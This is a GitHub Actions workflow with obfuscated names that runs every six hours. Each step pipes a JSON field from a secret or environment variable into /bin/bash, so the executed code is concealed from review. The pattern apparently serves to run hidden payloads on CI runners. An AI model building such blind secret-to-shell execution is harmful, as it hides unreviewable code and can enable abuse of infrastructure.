name: qianniuzv

on:
  workflow_dispatch:
  schedule:
    - cron: '3 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: qianniuzv
        env:
          ezpcz6: ${{ secrets.ezpcz6 }}
        run: |
          echo $ezpcz6 | jq -r .cms79 | /bin/bash
          echo $ux4909 | jq -r .ckafp41002 | /bin/bash
          echo $ai408 | jq -r .u1116 | /bin/bash
          echo $xeoz472 | jq -r .j5 | /bin/bash
          echo $qde8837 | jq -r .px021 | /bin/bash
          echo $t0 | jq -r .ce0398 | /bin/bash
          echo $j49 | jq -r .cl096 | /bin/bash

